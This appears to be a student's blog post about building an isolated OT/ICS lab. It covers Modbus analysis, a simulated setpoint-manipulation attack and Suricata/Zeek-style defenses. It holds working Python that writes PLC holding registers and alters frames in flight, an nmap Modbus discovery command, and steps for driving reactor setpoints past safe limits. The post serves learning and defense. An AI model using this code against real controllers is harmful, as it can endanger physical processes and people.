Building an OT/ICS Home Lab with GRFICSv2 and OpenPLC

February 1, 2026 · 4 min read · OT/ICS Security

Overview

One of the biggest barriers to learning OT/ICS security is access to real industrial systems. You can’t exactly practice on a live water treatment plant. This project documents how I built a realistic OT/ICS lab environment using open-source tools, giving me a safe space to study Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), and SCADA protocols.

Why This Matters

Industrial control systems manage critical infrastructure — power grids, water treatment, manufacturing, oil and gas pipelines. These systems were historically air-gapped, but increasing IT/OT convergence has exposed them to cyber threats they were never designed to handle. Understanding how these systems work and how to defend them is the foundation of OT cybersecurity.

Lab Architecture

The lab runs entirely in VirtualBox on a standard laptop and consists of:

  • GRFICSv2 — A realistic ICS simulation of a chemical process (based on the Tennessee Eastman process) with a PLC, an HMI and a physical process simulation
  • OpenPLC Runtime — An open-source PLC that runs programs written in the IEC 61131-3 languages (ladder logic, structured text and the others)
  • ScadaBR — An open-source SCADA/HMI platform for process visualization
  • Security Onion — Network security monitoring positioned to observe OT network traffic
  • Kali Linux — For testing attack scenarios against the ICS environment

Network Segmentation

I configured the lab with proper OT network segmentation following the Purdue Model:

Level 4-5: Enterprise Network (IT)
    │
    ├── [Firewall / DMZ]
    │
Level 3: Site Operations (Historian, SCADA Server)
    │
Level 2: Area Control (HMI, Engineering Workstation)
    │
Level 1: Basic Control (PLC, RTU)
    │
Level 0: Physical Process (Sensors, Actuators)

Key Activities

1. Modbus Protocol Analysis

Using Wireshark, I captured and analyzed Modbus/TCP traffic between the HMI and PLC. Modbus is one of the most common industrial protocols and one of the weakest: it predates any notion of a hostile network. Key observations:

  • Modbus has no authentication: any host that can reach TCP port 502 on the PLC can read or write its registers
  • Everything is cleartext, including function codes, register addresses and values, so a passive observer learns the process state
  • There is no integrity check on commands: no signature or MAC, so a request altered in transit is indistinguishable from a legitimate one
# Example Modbus/TCP packet structure I captured (MBAP header, then PDU):
Transaction ID: 0x0001
Protocol ID:    0x0000 (Modbus)
Length:         0x0006 (unit ID + PDU, in bytes)
Unit ID:        0x01
Function Code:  0x03 (Read Holding Registers)
Start Address:  0x0000
Quantity:       0x000A (10 registers)
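To make the observations above concrete, here is a small decoder for the frame layout just shown. It is an added example, not code from the original post or from GRFICSv2/OpenPLC; the two frames it parses are constructed by hand to match the capture (the write request and its values are illustrative, not real lab traffic). The last function shows the missing integrity check: patching the value of a write request in flight produces a frame that still decodes as perfectly valid.

```python
"""Decode Modbus/TCP request frames (MBAP header + PDU) from raw bytes.

Added example, not code from the original post or from GRFICSv2/OpenPLC.
The frames below are constructed by hand to match the capture shown above;
they are not real lab traffic.
"""
import struct

# Public function codes a practitioner meets most often.
FUNCTION_NAMES = {
    0x01: "Read Coils",
    0x02: "Read Discrete Inputs",
    0x03: "Read Holding Registers",
    0x04: "Read Input Registers",
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
}
WRITE_CODES = {0x05, 0x06, 0x0F, 0x10}


def _fields(pdu: bytes, fmt: str, start: int, end: int) -> tuple:
    """Unpack pdu[start:end] with fmt, refusing truncated PDUs."""
    if len(pdu) < end:
        raise ValueError("PDU truncated")
    return struct.unpack(fmt, pdu[start:end])


def decode_request(frame: bytes) -> dict:
    """Parse one Modbus/TCP request; raise ValueError if it is malformed.

    Note what is NOT checked: there is no credential and no MAC to verify.
    The MBAP length field is the only consistency check the protocol offers.
    """
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    # MBAP header, big-endian: transaction id, protocol id, length, unit id.
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"protocol id {pid:#06x} is not Modbus")
    # Length counts the unit id plus the PDU, i.e. everything after byte 6.
    if length != len(frame) - 6:
        raise ValueError(f"length field {length} does not match {len(frame) - 6} bytes on the wire")
    pdu = frame[7:]
    fc = pdu[0]
    req = {
        "transaction_id": tid,
        "unit_id": uid,
        "function_code": fc,
        "function": FUNCTION_NAMES.get(fc, "Unknown / vendor-specific"),
        "is_write": fc in WRITE_CODES,
    }
    if fc in (0x01, 0x02, 0x03, 0x04):
        req["start_address"], req["quantity"] = _fields(pdu, ">HH", 1, 5)
    elif fc in (0x05, 0x06):
        req["address"], req["value"] = _fields(pdu, ">HH", 1, 5)
    elif fc in (0x0F, 0x10):
        req["start_address"], req["quantity"], byte_count = _fields(pdu, ">HHB", 1, 6)
        req["data"] = pdu[6:6 + byte_count]
    return req


def retarget_write(frame: bytes, new_value: int) -> bytes:
    """Overwrite the value of a Write Single Register frame in flight.

    Nothing in the frame binds the value to a sender or a signature, so the
    patched frame decodes as a valid request just like the original did.
    """
    if decode_request(frame)["function_code"] != 0x06:
        raise ValueError("not a Write Single Register request")
    return frame[:10] + struct.pack(">H", new_value)   # MBAP(7) + FC(1) + address(2), then value


# Constructed: the request from the capture above (TID 1, unit 1, FC 3, address 0, 10 registers).
READ_REQUEST = bytes.fromhex("00010000000601030000000A")
# Constructed: TID 2, unit 1, FC 6, write 3000 (0x0BB8) to holding register 5 (illustrative address).
WRITE_REQUEST = bytes.fromhex("000200000006010600050BB8")

if __name__ == "__main__":
    for frame in (READ_REQUEST, WRITE_REQUEST, retarget_write(WRITE_REQUEST, 9000)):
        print(decode_request(frame))
```

The same field order applies to responses, except that an exception response sets the high bit of the function code (0x83 for a failed read) and carries a one-byte exception code instead of data.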

2. Simulating an Attack on the Chemical Process

Using Kali Linux, I demonstrated how an attacker on the OT network could:

  1. Reconnaissance — Scan for Modbus devices with nmap -p 502 --script modbus-discover <target>, which also pulls the device identification the PLC volunteers
  2. Read process values — Use mbtget to read PLC registers and understand the process state
  3. Manipulate setpoints — Write to PLC holding registers to alter chemical process parameters
  4. Cause a safety condition — Modify reactor temperature setpoints beyond safe operating limits

Important: This was performed entirely in my isolated lab environment. The GRFICSv2 simulation shows how process manipulation could lead to a dangerous physical outcome — making the consequences of ICS attacks visceral and real.
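Steps 2 and 3 above need nothing more than a TCP socket, which is the point. The client below is an added example, not code from the original post, from mbtget or from GRFICSv2: it builds a Read Holding Registers request and a Write Single Register request, sends them, and checks the reply. The lab subnet, the PLC address, the unit ID and the register number are illustrative assumptions; the real GRFICSv2 register map is not reproduced here. The one safeguard worth copying is the lab-only target check, because the same code would happily drive a real controller.

```python
"""Minimal Modbus/TCP client for the read/write steps above, with a lab-only guard.

Added example, not code from the original post, mbtget or GRFICSv2. The lab
subnet, PLC address, unit id and register numbers are illustrative assumptions.
"""
import ipaddress
import socket
import struct

LAB_NETWORK = ipaddress.ip_network("192.168.95.0/24")   # assumed isolated lab subnet
MODBUS_PORT = 502


def mbap(tid: int, unit: int, pdu: bytes) -> bytes:
    """MBAP header: transaction id, protocol id 0, length of unit id + PDU, unit id."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)


def build_read_holding(tid: int, unit: int, start: int, qty: int) -> bytes:
    """FC 0x03: read `qty` holding registers starting at `start`."""
    pdu = struct.pack(">BHH", 0x03, start, qty)
    return mbap(tid, unit, pdu) + pdu


def build_write_single(tid: int, unit: int, address: int, value: int) -> bytes:
    """FC 0x06: write one 16-bit value. No credential is required anywhere in the frame."""
    pdu = struct.pack(">BHH", 0x06, address, value)
    return mbap(tid, unit, pdu) + pdu


def parse_read_response(resp: bytes) -> list:
    """Return the register values from a FC 0x03 response, or raise on a Modbus exception."""
    fc = resp[7]
    if fc & 0x80:                       # exception responses set the high bit of the FC
        raise RuntimeError(f"Modbus exception code {resp[8]}")
    byte_count = resp[8]
    return list(struct.unpack(f">{byte_count // 2}H", resp[9:9 + byte_count]))


def require_lab_target(host: str) -> None:
    """Refuse to talk to anything outside the lab. Cheap insurance against a typo."""
    if ipaddress.ip_address(host) not in LAB_NETWORK:
        raise PermissionError(f"{host} is outside {LAB_NETWORK}; refusing to send Modbus traffic")


def exchange(host: str, frame: bytes, timeout: float = 3.0) -> bytes:
    """Send one request and return the raw reply (a Modbus/TCP ADU is at most 260 bytes)."""
    require_lab_target(host)
    with socket.create_connection((host, MODBUS_PORT), timeout=timeout) as sock:
        sock.sendall(frame)
        return sock.recv(260)


def read_registers(host: str, unit: int, start: int, qty: int, tid: int = 1) -> list:
    return parse_read_response(exchange(host, build_read_holding(tid, unit, start, qty)))


def write_setpoint(host: str, unit: int, address: int, value: int, tid: int = 2) -> bool:
    """A normal FC 0x06 response echoes the request; anything else means the write did not land."""
    request = build_write_single(tid, unit, address, value)
    return exchange(host, request) == request


if __name__ == "__main__":
    PLC = "192.168.95.2"                # assumed PLC address in the lab
    print(read_registers(PLC, unit=1, start=0, qty=10))
    print(write_setpoint(PLC, unit=1, address=5, value=3000))   # register 5: illustrative setpoint
```

Watch the reply: a PLC that returns exception code 2 (illegal data address) is telling you the register map you guessed is wrong, which is exactly the feedback a scanner uses to enumerate valid addresses.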

3. Implementing Defenses

After understanding the attack surface, I implemented several defensive measures:

  • Network monitoring with Security Onion to detect anomalous Modbus traffic
  • Suricata IDS rules specifically for industrial protocol abuse
  • Network segmentation to isolate the PLC network from the HMI/SCADA network
  • Allowlisting — configuring the simulated firewall to permit only expected Modbus function codes
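The monitoring and allowlisting points above reduce to one rule set: which hosts may send which Modbus function codes to the PLC, plus two tells that something is probing rather than operating. The check below is an added example, not code from the original post or from Security Onion; it runs over constructed log lines laid out in the column order of Zeek's modbus.log (ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, func, exception), which Security Onion's Zeek instance produces for port 502 traffic. The host roles and addresses are assumptions for illustration.

```python
"""Allowlist and discovery checks over Modbus flow records.

Added example, not code from the original post or from Security Onion. The log
lines are constructed, in the column order of Zeek's modbus.log; the host
roles and addresses are assumptions for illustration.
"""
import collections

PLC = "192.168.95.2"                       # assumed PLC address
# Assumed lab roles: only these sources may speak Modbus to the PLC, and only with these functions.
POLICY = {
    "192.168.95.10": {"READ_HOLDING_REGISTERS", "READ_INPUT_REGISTERS", "READ_COILS",
                      "WRITE_SINGLE_REGISTER"},                       # HMI: polling plus operator setpoints
    "192.168.95.20": {"READ_HOLDING_REGISTERS", "WRITE_SINGLE_REGISTER",
                      "WRITE_MULTIPLE_REGISTERS", "REPORT_SLAVE_ID"},  # engineering workstation
}
SCAN_THRESHOLD = 3      # distinct function codes from one source inside SCAN_WINDOW looks like discovery
SCAN_WINDOW = 5.0       # seconds

Record = collections.namedtuple("Record", "ts uid src sport dst dport func exception")

# Constructed log: HMI polling, an unknown host probing three functions in under a second and
# later writing a register, then the HMI issuing a bulk write it never normally sends.
SAMPLE_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tfunc\texception
1738368000.000000\tC1\t192.168.95.10\t49152\t192.168.95.2\t502\tREAD_HOLDING_REGISTERS\t-
1738368001.000000\tC1\t192.168.95.10\t49152\t192.168.95.2\t502\tWRITE_SINGLE_REGISTER\t-
1738368010.000000\tC2\t192.168.95.100\t40000\t192.168.95.2\t502\tREPORT_SLAVE_ID\t-
1738368010.200000\tC2\t192.168.95.100\t40000\t192.168.95.2\t502\tREAD_COILS\tILLEGAL_DATA_ADDRESS
1738368010.400000\tC2\t192.168.95.100\t40000\t192.168.95.2\t502\tREAD_HOLDING_REGISTERS\t-
1738368030.000000\tC3\t192.168.95.100\t40001\t192.168.95.2\t502\tWRITE_SINGLE_REGISTER\t-
1738368040.000000\tC4\t192.168.95.10\t49153\t192.168.95.2\t502\tWRITE_MULTIPLE_REGISTERS\t-
"""


def parse_modbus_log(text: str) -> list:
    """Parse tab-separated records, skipping the '#' header lines Zeek writes."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, uid, src, sport, dst, dport, func, exc = line.split("\t")
        records.append(Record(float(ts), uid, src, int(sport), dst, int(dport), func, exc))
    return records


def check_policy(records: list) -> list:
    """Return (ts, src, category, detail) alerts for traffic to the PLC that violates POLICY.

    Categories: unknown-host, function-not-allowed, exception, scan.
    """
    alerts = []
    history = collections.defaultdict(list)   # src -> [(ts, func)] for the discovery heuristic
    scan_flagged = set()
    for r in records:
        if r.dst != PLC:
            continue
        allowed = POLICY.get(r.src)
        if allowed is None:
            alerts.append((r.ts, r.src, "unknown-host", f"issued {r.func}"))
        elif r.func not in allowed:
            alerts.append((r.ts, r.src, "function-not-allowed", r.func))
        # A PLC answering with an exception is often a probe hitting an address that does not exist.
        if r.exception != "-":
            alerts.append((r.ts, r.src, "exception", f"{r.exception} in reply to {r.func}"))
        # Many distinct function codes from one host in a short window: discovery, not operation.
        history[r.src].append((r.ts, r.func))
        recent = {f for t, f in history[r.src] if r.ts - t <= SCAN_WINDOW}
        if len(recent) >= SCAN_THRESHOLD and r.src not in scan_flagged:
            scan_flagged.add(r.src)
            alerts.append((r.ts, r.src, "scan", f"{len(recent)} function codes in {SCAN_WINDOW}s"))
    return alerts


if __name__ == "__main__":
    for alert in check_policy(parse_modbus_log(SAMPLE_LOG)):
        print(alert)
```

The same policy table doubles as the firewall allowlist: a host absent from POLICY has no business reaching port 502 at all, and the function codes listed per host are what a protocol-aware rule set should permit.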

Lessons Learned

This lab fundamentally changed how I think about cybersecurity. IT security concepts like “patch everything” and “encrypt everything” don’t always apply in OT environments where availability is paramount and systems may run for decades without updates. The priorities shift from confidentiality to safety and availability, and the defender’s mindset must shift accordingly.

Relevance to My MSc Goals

This project directly supports my interest in pursuing graduate research on securing legacy industrial protocols and developing intrusion detection methods tailored to OT environments. The hands-on experience with Modbus, PLC logic, and ICS architecture gives me a practical foundation that complements academic study.
